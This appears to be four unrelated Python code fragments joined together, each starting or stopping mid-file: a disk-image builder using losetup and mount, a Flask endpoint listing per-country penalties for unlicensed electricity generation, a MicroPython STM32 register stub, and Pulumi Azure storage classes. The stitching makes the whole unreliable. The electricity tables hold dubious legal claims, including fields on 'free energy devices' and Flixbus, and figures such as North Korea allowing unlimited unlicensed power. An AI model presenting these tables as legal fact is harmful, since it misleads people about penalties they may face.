r"p[0-9]*"))) def __exit__(self, type, value, traceback): try: subprocess.run(["fusermount", "-u", self.mountdir], check=True) except subprocess.CalledProcessError as err: print_error("Unmount failed.") raise err os.rmdir(self.mountdir) print_ok(f"Partfs {self.mountdir} unmounted.") class Losetup: """ Mounts diskimage partitions as loop devices This requires permissions to create or loop devices. This tries to use free loop device if available. If not then it tries to create one with mknod. On exit it will free the losetup but does not try to delete the created mknod. """ def __init__(self, diskimage: str): self.diskimage = diskimage def __enter__(self): self.device = None # Get or create losetup device losetup_f = subprocess.run(["losetup", "-f"], text=True, capture_output=True) if losetup_f.returncode == 0: self.device = losetup_f.stdout.strip() elif losetup_f.stderr.startswith( "losetup: cannot find an unused loop device: No such device" ): subprocess.run(["mknod", "/dev/loop0", "b", "7", "0"], check=True) self.device = "/dev/loop0" else: losetup_f.check_returncode() try: subprocess.run(["losetup", "-P", self.device, self.diskimage], check=True) except subprocess.CalledProcessError as err: print_error(f"Losetup {self.device} failed.") raise err print_ok(f"Losetup {self.device} created.") return glob.glob(os.path.join(self.device, r"p[0-9]*")) def __exit__(self, type, value, traceback): if self.device: try: subprocess.run(["losetup", "-d", self.device], check=True) except subprocess.CalledProcessError as err: print_error(f"Losetup failed to free device: {self.device}") raise err print_ok(f"Losetup {self.device} freed.") class Mount: """ Normal Linux mount operation """ def __init__(self, source: str, target: str): self.source = source self.target = target def __enter__(self): if not os.path.isdir(self.target): os.mkdir(self.target) try: subprocess.run(["mount", self.source, self.target], check=True) except subprocess.CalledProcessError as err: print_error("Mount failed.") raise err print_ok(f"Mount {self.target} created.") return self.target def __exit__(self, type, value, traceback): try: subprocess.run(["umount", self.target], check=True) except subprocess.CalledProcessError as err: print_error(f"Unmount failed to free target: {self.target}") raise err os.rmdir(self.target) print_ok(f"Mount {self.target} freed.") class Partition: def __init__(self, filename: str, parted: str, fstype: str = ""): self.filename = filename self.parted = parted self.fstype = fstype def is_mountable(self): if self.fstype == "linux-swap": return False return True def try_copy_to(self, to_dir: str): if os.path.isdir(self.filename): # Directory print_notice(f"Copy -rp files from '{self.filename}' to '{to_dir}'...") try: subprocess.run(["cp", "-rp", self.filename, to_dir], check=True) except subprocess.CalledProcessError as err: print_error("Copying files failed.") raise err print_ok(f"Copying from '{self.filename}' succeeded.") elif self.filename.endswith(".tar"): # .tar files print_notice(f"Untar files from '{self.filename}' to '{to_dir}'...") try: subprocess.run( ["tar", "--same-owner", "-xf", self.filename, "-C", to_dir], check=True, ) except subprocess.CalledProcessError as err: print_error("Untar failed.") raise err print_ok(f"Untar from '{self.filename}' succeeded.") elif self.filename.endswith(".tar.gz"): # .tar.gz files print_notice(f"Untar gzip files from '{self.filename}' to '{to_dir}'...") try: subprocess.run( ["tar", "--same-owner", "-xzf", self.filename, "-C", to_dir], check=True, ) except subprocess.CalledProcessError as err: print_error("Untar failed.") raise err print_ok(f"Untar from '{self.filename}' succeeded.") class PartitionCollection: def __init__(self, partitions: List[Partition]): self._partitions = partitions def get_total_size(self): """ Tries to get the total size of the image In long format it's defined in first file for example: `-- dd 1GiB` In short format it's defined in the last file. """ long_format = re.compile(r".* -- dd (?P<size_all>[^ $]+)") short_format = re.compile(r".*partition(\d\d?)[_ ](?P<partition_end>[^_ ]+)") # In long format the size is on first file m = long_format.match(self._partitions[0].filename) if m: return _parse_size(m.group("size_all")) # In short format the size is the last partition end m = short_format.match(self._partitions[-1].filename) if m: return _parse_size(m.group("partition_end")) raise PartitionSizeParseException() def get_parted(self): return list(map(lambda k: k.parted, self._partitions)) def get_fstypes(self): return list(map(lambda k: k.fstype, self._partitions)) def __iter__(self): return iter(self._partitions) @classmethod def from_directory(cls, from_dir: str): partition_filenames = sorted( glob.glob(os.path.join(from_dir, "partition[0-9][0-9]?*")) ) partitions = _try_get_partitions_long_format( partition_filenames ) or _try_get_partitions_short_format(partition_filenames) if len(partitions) == 0: raise PartitionsNotFoundException() return PartitionCollection(partitions) class Imagefile: def __init__(self, filename: str): self.filename = filename def make_empty(self, total_size: int, overwrite: bool = False): _try_dd(self.filename, total_size, overwrite) def partition(self, partitions: PartitionCollection): _try_parted(self.filename, partitions.get_parted()) def mount( self, partitions: PartitionCollection, use_partfs=False, partfs_mount_dir="/mnt/_temp_partfs", ): return ImagefileMounted( self, partitions, use_partfs=use_partfs, partfs_mount_dir=partfs_mount_dir ) class ImagefileMounted: def __init__( self, imagefile: Imagefile, partitions: PartitionCollection, use_partfs=False, partfs_mount_dir="/mnt/_temp_partfs", ): self.imagefile = imagefile self.use_partfs = use_partfs self.partitions = partitions self.partfs_mount_dir = partfs_mount_dir def __enter__(self): if self.use_partfs: self._mount = Partfs(self.imagefile.filename, self.partfs_mount_dir) else: self._mount = Losetup(self.imagefile.filename) self._partition_dirs = self._mount.__enter__() return zip(self.partitions, self._partition_dirs) def __exit__(self, type, value, traceback): self._mount.__exit__(type, value, traceback) def try_create_image( rootdir: str, imagefilename: str, overwrite: bool = False, use_partfs=False, partfs_mount_dir="/mnt/_temp_partfs", mount_root_dir="/mnt/_temp_fs", ): print(f"Partitions directory: {rootdir}") print(f"Image file to create: {imagefilename}") partitions = PartitionCollection.from_directory(rootdir) total_size = partitions.get_total_size() imagefile = Imagefile(imagefilename) imagefile.make_empty(total_size, overwrite) imagefile.partition(partitions) with imagefile.mount( partitions, use_partfs=use_partfs, partfs_mount_dir=partfs_mount_dir ) as partition_dirs: for partition, partition_dir in partition_dirs: _try_mkfs(partition_dir, partition.fstype) if partition.is_mountable(): with Mount(partition_dir, mount_root_dir) as mntdir: partition.try_copy_to(mntdir) def parse_cli_arguments(): # https://docs.python.org/3/library/argparse.html # https://docs.python.org/3/howto/argparse.html parser = argparse.ArgumentParser( formatter_class=argparse.RawTextHelpFormatter, description=DESCRIPTION ) parser.add_argument("imagefile", action="store") parser.add_argument( "-d", "--partitions-dir", help="Directory of the partitions, defaults to current directory", action="store", default=".", ) parser.add_argument( "-f", "--force", help="Overwrites any existing image file", action="store_true" ) parser.add_argument( "--use-partfs", help="Uses FUSE based partfs instead of losetup for mounting partitions, defaults to true in docker environment", action="store_true", ) parser.add_argument("-v", "--verbose", action="store_true") return (parser, parser.parse_args()) def main(): global VERBOSE _, args = parse_cli_arguments() _set_verbose(args.verbose) # TODO: Something fun? # if sys.stdout.isatty(): # print_notice("You are running interactively") # Fail if partitions directory does not exist if not os.path.isdir(args.partitions_dir): print_error(f"Directory '{args.partitions_dir}' does not exist") exit(1) # Call the main creator try: try_create_image( args.partitions_dir, args.imagefile, overwrite=args.force, use_partfs=args.use_partfs, partfs_mount_dir="/mnt/_tmp_partfs{}".format(uuid.uuid4().hex), ) except ImageFileExistsException as err: print_error( f"Image file '{err.imagefile}' already exists, use `-f` to overwrite" ) except PartitionsNotFoundException: print_error(f"Directory '{args.partitions_dir}' does not contain partitions.") exit(1) except PartitionSizeParseException as err: print_error(f"Unable to parse disk size {err.size}") exit(1) except PartitionParseException as err: print_error(f"Unable to parse partition file name: {err.filename}") exit(1) except subprocess.CalledProcessError as err: print_error( f"Return code: {err.returncode}, Command: {subprocess.list2cmdline(err.cmd)}" ) exit(1) def _parse_size(size: str): """ Parse size for parted Note: This is not accurate reproduction of parted function `ped_unit_parse_custom` """ units = { "": 1000 ** 2, # Parted assumes MB if no unit is given "s": 512, # Can this vary? "b": 1, "kb": 1000, "mb": 1000 ** 2, "gb": 1000 ** 3, "tb": 1000 ** 4, "kib": 1024, "mib": 1024 ** 2, "gib": 1024 ** 3, "tib": 1024 ** 4, } m = re.match(r"^([\d\.]+)(.*)$",
to unlimited power / Any devices', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'China', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'North Korea', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'South Korea', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'United Arab Emirates', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Georgia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'India', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Indonesia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Iraq', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Iran', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Israel', 'k2': '?', 'k3': '3', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Japan', 'k2': '1 million yen', 'k3': '5', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Jordan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kazakhstan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kyrgyzstan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kuwait', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Laos', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Lebanon', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Malaysia', 'k2': '100 thousand ringgit', 'k3': '5', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'The Maldives', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Mongolia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1,5 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Nepal', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Oman', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Uzbekistan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Pakistan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Palestine', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Philippines', 'k2': 'Fifty million pesos ', 'k3': '2', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Qatar', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Singapore', 'k2': '$500,000', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Sri Lanka', 'k2': 'A fine not less than one hundred thousand rupees and not exceeding ten million rupees', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Syria', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Tajikistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Thailand', 'k2': '0,00 €', 'k3': '2', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Timor Leste', 'k2': 'a fine of US$ 500 to US$ 5,000 or of US$ 5,000 to US$ 50,000,', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Turkmenistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Vietnam', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Yemen', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Kurdistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Tibet', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ryūkyū', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Christmas island', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Cocos island', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Hong Kong', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Macao', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Abkhazie', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Haut-Karabagh', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'South Ossetia', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Taiwan', 'k2': 'NT$200,000 to NT$2,000,000', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'} ] return jsonify(data) # Get information about electricity generation without license in Africa # k1 = country # k2 = Amount of the fine for electricity generation without license and not connected to the national grid for # internal needs ? # k3 = Number of years of imprisonment for electricity generation without license and not linked to any grid or # network for internal needs ? # k4 = Possible use of free energy devices for internal needs without licence ? # k5 = Possible control of the power plant by any jurisdictions without that the producer holds a license ? # k6 = Flixbus in the capital ? @app.route("/international_electricity_generation_without_license_in_africa") def international_electricity_generation_without_license_in_africa(): data = [ {'k1': 'South Africa', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Algeria', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 MW with declaration / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Angola', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Benin', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Botswana', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 kW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Burkina Faso', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Burundi', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Cameroon', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 100 kW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Cape Verde', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Central African Republic', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Comoros', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Republic of Congo', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Democratic Republic Of The Congo', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ivory coast', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Djibouti', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Egypt', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Eritrea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ethiopia', 'k2': '?', 'k3': '?', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Eswatini', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Gabon', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Gambia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Ghana', 'k2': '?', 'k3': '?', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Guinea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Guinea Bissau', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Equatorial Guinea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Kenya', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Lesotho', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Liberia', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'},
<filename>stubs/micropython-v1_12-pyboard/stm.py<gh_stars>0 """ Module: 'stm' on micropython-v1.12-pyboard """ # MCU: {'ver': 'v1.12', 'port': 'pyboard', 'arch': 'armv7emsp', 'sysname': 'pyboard', 'release': '1.12.0', 'name': 'micropython', 'mpy': 7685, 'version': '1.12.0', 'machine': 'PYBv1.1 with STM32F405RG', 'build': '', 'nodename': 'pyboard', 'platform': 'pyboard', 'family': 'micropython'} # Stubber: 1.5.4 from typing import Any ADC1 = 1073815552 # type: int ADC123_COMMON = 1073816320 # type: int ADC2 = 1073815808 # type: int ADC3 = 1073816064 # type: int ADC_CR1 = 4 # type: int ADC_CR2 = 8 # type: int ADC_DR = 76 # type: int ADC_HTR = 36 # type: int ADC_JDR1 = 60 # type: int ADC_JDR2 = 64 # type: int ADC_JDR3 = 68 # type: int ADC_JDR4 = 72 # type: int ADC_JOFR1 = 20 # type: int ADC_JOFR2 = 24 # type: int ADC_JOFR3 = 28 # type: int ADC_JOFR4 = 32 # type: int ADC_JSQR = 56 # type: int ADC_LTR = 40 # type: int ADC_SMPR1 = 12 # type: int ADC_SMPR2 = 16 # type: int ADC_SQR1 = 44 # type: int ADC_SQR2 = 48 # type: int ADC_SQR3 = 52 # type: int ADC_SR = 0 # type: int CAN1 = 1073767424 # type: int CAN2 = 1073768448 # type: int CRC = 1073885184 # type: int CRC_CR = 8 # type: int CRC_DR = 0 # type: int CRC_IDR = 4 # type: int DAC = 1073771520 # type: int DAC1 = 1073771520 # type: int DAC_CR = 0 # type: int DAC_DHR12L1 = 12 # type: int DAC_DHR12L2 = 24 # type: int DAC_DHR12LD = 36 # type: int DAC_DHR12R1 = 8 # type: int DAC_DHR12R2 = 20 # type: int DAC_DHR12RD = 32 # type: int DAC_DHR8R1 = 16 # type: int DAC_DHR8R2 = 28 # type: int DAC_DHR8RD = 40 # type: int DAC_DOR1 = 44 # type: int DAC_DOR2 = 48 # type: int DAC_SR = 52 # type: int DAC_SWTRIGR = 4 # type: int DBGMCU = 3758366720 # type: int DBGMCU_APB1FZ = 8 # type: int DBGMCU_APB2FZ = 12 # type: int DBGMCU_CR = 4 # type: int DBGMCU_IDCODE = 0 # type: int DMA1 = 1073897472 # type: int DMA2 = 1073898496 # type: int DMA_HIFCR = 12 # type: int DMA_HISR = 4 # type: int DMA_LIFCR = 8 # type: int DMA_LISR = 0 # type: int EXTI = 1073822720 # type: int EXTI_EMR = 4 # type: int EXTI_FTSR = 12 # type: int EXTI_IMR = 0 # type: int EXTI_PR = 20 # type: int EXTI_RTSR = 8 # type: int EXTI_SWIER = 16 # type: int FLASH = 1073888256 # type: int FLASH_ACR = 0 # type: int FLASH_CR = 16 # type: int FLASH_KEYR = 4 # type: int FLASH_OPTCR = 20 # type: int FLASH_OPTCR1 = 24 # type: int FLASH_OPTKEYR = 8 # type: int FLASH_SR = 12 # type: int GPIOA = 1073872896 # type: int GPIOB = 1073873920 # type: int GPIOC = 1073874944 # type: int GPIOD = 1073875968 # type: int GPIOE = 1073876992 # type: int GPIOF = 1073878016 # type: int GPIOG = 1073879040 # type: int GPIOH = 1073880064 # type: int GPIOI = 1073881088 # type: int GPIO_AFR0 = 32 # type: int GPIO_AFR1 = 36 # type: int GPIO_BSRR = 24 # type: int GPIO_BSRRH = 26 # type: int GPIO_BSRRL = 24 # type: int GPIO_IDR = 16 # type: int GPIO_LCKR = 28 # type: int GPIO_MODER = 0 # type: int GPIO_ODR = 20 # type: int GPIO_OSPEEDR = 8 # type: int GPIO_OTYPER = 4 # type: int GPIO_PUPDR = 12 # type: int I2C1 = 1073763328 # type: int I2C2 = 1073764352 # type: int I2C3 = 1073765376 # type: int I2C_CCR = 28 # type: int I2C_CR1 = 0 # type: int I2C_CR2 = 4 # type: int I2C_DR = 16 # type: int I2C_OAR1 = 8 # type: int I2C_OAR2 = 12 # type: int I2C_SR1 = 20 # type: int I2C_SR2 = 24 # type: int I2C_TRISE = 32 # type: int I2S2EXT = 1073755136 # type: int I2S3EXT = 1073758208 # type: int IWDG = 1073754112 # type: int IWDG_KR = 0 # type: int IWDG_PR = 4 # type: int IWDG_RLR = 8 # type: int IWDG_SR = 12 # type: int PWR = 1073770496 # type: int PWR_CR = 0 # type: int PWR_CSR = 4 # type: int RCC = 1073887232 # type: int RCC_AHB1ENR = 48 # type: int RCC_AHB1LPENR = 80 # type: int RCC_AHB1RSTR = 16 # type: int RCC_AHB2ENR = 52 # type: int RCC_AHB2LPENR = 84 # type: int RCC_AHB2RSTR = 20 # type: int RCC_AHB3ENR = 56 # type: int RCC_AHB3LPENR = 88 # type: int RCC_AHB3RSTR = 24 # type: int RCC_APB1ENR = 64 # type: int RCC_APB1LPENR = 96 # type: int RCC_APB1RSTR = 32 # type: int RCC_APB2ENR = 68 # type: int RCC_APB2LPENR = 100 # type: int RCC_APB2RSTR = 36 # type: int RCC_BDCR = 112 # type: int RCC_CFGR = 8 # type: int RCC_CIR = 12 # type: int RCC_CR = 0 # type: int RCC_CSR = 116 # type: int RCC_PLLCFGR = 4 # type: int RCC_PLLI2SCFGR = 132 # type: int RCC_SSCGR = 128 # type: int RNG = 1342572544 # type: int RNG_CR = 0 # type: int RNG_DR = 8 # type: int RNG_SR = 4 # type: int RTC = 1073752064 # type: int RTC_ALRMAR = 28 # type: int RTC_ALRMASSR = 68 # type: int RTC_ALRMBR = 32 # type: int RTC_ALRMBSSR = 72 # type: int RTC_BKP0R = 80 # type: int RTC_BKP10R = 120 # type: int RTC_BKP11R = 124 # type: int RTC_BKP12R = 128 # type: int RTC_BKP13R = 132 # type: int RTC_BKP14R = 136 # type: int RTC_BKP15R = 140 # type: int RTC_BKP16R = 144 # type: int RTC_BKP17R = 148 # type: int RTC_BKP18R = 152 # type: int RTC_BKP19R = 156 # type: int RTC_BKP1R = 84 # type: int RTC_BKP2R = 88 # type: int RTC_BKP3R = 92 # type: int RTC_BKP4R = 96 # type: int RTC_BKP5R = 100 # type: int RTC_BKP6R = 104 # type: int RTC_BKP7R = 108 # type: int RTC_BKP8R = 112 # type: int RTC_BKP9R = 116 # type: int RTC_CALIBR = 24 # type: int RTC_CALR = 60 # type: int RTC_CR = 8 # type: int RTC_DR = 4 # type: int RTC_ISR = 12 # type: int RTC_PRER = 16 # type: int RTC_SHIFTR = 44 # type: int RTC_SSR = 40 # type: int RTC_TAFCR = 64 # type: int RTC_TR = 0 # type: int RTC_TSDR = 52 # type: int RTC_TSSSR = 56 # type: int RTC_TSTR = 48 # type: int RTC_WPR = 36 # type: int RTC_WUTR = 20 # type: int SDIO = 1073818624 # type: int SPI1 = 1073819648 # type: int SPI2 = 1073756160 # type: int SPI3 = 1073757184 # type: int SPI_CR1 = 0 # type: int SPI_CR2 = 4 # type: int SPI_CRCPR = 16 # type: int SPI_DR = 12 # type: int SPI_I2SCFGR = 28 # type: int SPI_I2SPR = 32 # type: int SPI_RXCRCR = 20 # type: int SPI_SR = 8 # type: int SPI_TXCRCR = 24 # type: int SYSCFG = 1073821696 # type: int SYSCFG_CMPCR = 32 # type: int SYSCFG_EXTICR0 = 8 # type: int SYSCFG_EXTICR1 = 12 # type: int SYSCFG_EXTICR2 = 16 # type: int SYSCFG_EXTICR3 = 20 # type: int SYSCFG_MEMRMP = 0 # type: int SYSCFG_PMC = 4 # type: int TIM1 = 1073807360 # type: int TIM10 = 1073824768 # type: int TIM11 = 1073825792 # type: int TIM12 = 1073747968 # type: int TIM13 = 1073748992 # type: int TIM14 = 1073750016 # type: int TIM2 = 1073741824 # type: int TIM3 = 1073742848 # type: int TIM4 = 1073743872 # type: int TIM5 = 1073744896 # type: int TIM6 = 1073745920 # type: int TIM7 = 1073746944 # type: int TIM8 = 1073808384 # type: int TIM9 = 1073823744 # type: int TIM_ARR = 44 # type: int TIM_BDTR = 68 # type: int TIM_CCER = 32 # type: int TIM_CCMR1 = 24 # type: int TIM_CCMR2 = 28 # type: int TIM_CCR1 = 52 # type: int TIM_CCR2 = 56 # type: int TIM_CCR3 = 60 # type: int TIM_CCR4 = 64 # type: int TIM_CNT = 36 # type: int TIM_CR1 = 0 # type: int TIM_CR2 = 4 # type: int TIM_DCR = 72 # type: int TIM_DIER = 12 # type: int TIM_DMAR = 76 # type: int TIM_EGR = 20 # type: int TIM_OR = 80 # type: int TIM_PSC = 40 # type: int TIM_RCR = 48 # type: int TIM_SMCR = 8 # type: int TIM_SR = 16 # type: int UART4 = 1073761280 # type: int UART5 = 1073762304 # type: int USART1 = 1073811456 # type: int USART2 = 1073759232 # type: int USART3 = 1073760256 # type: int USART6 = 1073812480 # type: int USART_BRR = 8 # type: int USART_CR1 = 12 # type: int USART_CR2 = 16 # type: int USART_CR3 = 20
- Specifies the default action of allow or deny when no other rules match. Possible values include: 'DefaultActionAllow', 'DefaultActionDeny' """ return pulumi.get(self, "default_action") @default_action.setter def default_action(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_action", value) @property @pulumi.getter(name="ipRules") def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]: """ IPRules - Sets the IP ACL rules """ return pulumi.get(self, "ip_rules") @ip_rules.setter def ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]): pulumi.set(self, "ip_rules", value) @property @pulumi.getter(name="virtualNetworkRules") def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]: """ VirtualNetworkRules - Sets the virtual network rules """ return pulumi.get(self, "virtual_network_rules") @virtual_network_rules.setter def virtual_network_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]): pulumi.set(self, "virtual_network_rules", value) @pulumi.input_type class StorageAccountSpecNetworkRuleIpRulesArgs: def __init__(__self__, *, ip_address_or_range: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] ip_address_or_range: IPAddressOrRange - Specifies the IP or IP range in CIDR format. Only IPV4 address is allowed. """ if ip_address_or_range is not None: pulumi.set(__self__, "ip_address_or_range", ip_address_or_range) @property @pulumi.getter(name="ipAddressOrRange") def ip_address_or_range(self) -> Optional[pulumi.Input[str]]: """ IPAddressOrRange - Specifies the IP or IP range in CIDR format. Only IPV4 address is allowed. """ return pulumi.get(self, "ip_address_or_range") @ip_address_or_range.setter def ip_address_or_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip_address_or_range", value) @pulumi.input_type class StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs: def __init__(__self__, *, subnet_id: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] subnet_id: SubnetId - Resource ID of a subnet, for example: /subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}. """ if subnet_id is not None: pulumi.set(__self__, "subnet_id", subnet_id) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> Optional[pulumi.Input[str]]: """ SubnetId - Resource ID of a subnet, for example: /subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}. """ return pulumi.get(self, "subnet_id") @subnet_id.setter def subnet_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "subnet_id", value) @pulumi.input_type class StorageAccountSpecSkuArgs: def __init__(__self__, *, name: Optional[pulumi.Input[str]] = None): """ StorageAccountSku the SKU of the storage account. :param pulumi.Input[str] name: Name - The SKU name. Required for account creation; optional for update. Possible values include: 'StandardLRS', 'StandardGRS', 'StandardRAGRS', 'StandardZRS', 'PremiumLRS', 'PremiumZRS', 'StandardGZRS', 'StandardRAGZRS' """ if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Name - The SKU name. Required for account creation; optional for update. Possible values include: 'StandardLRS', 'StandardGRS', 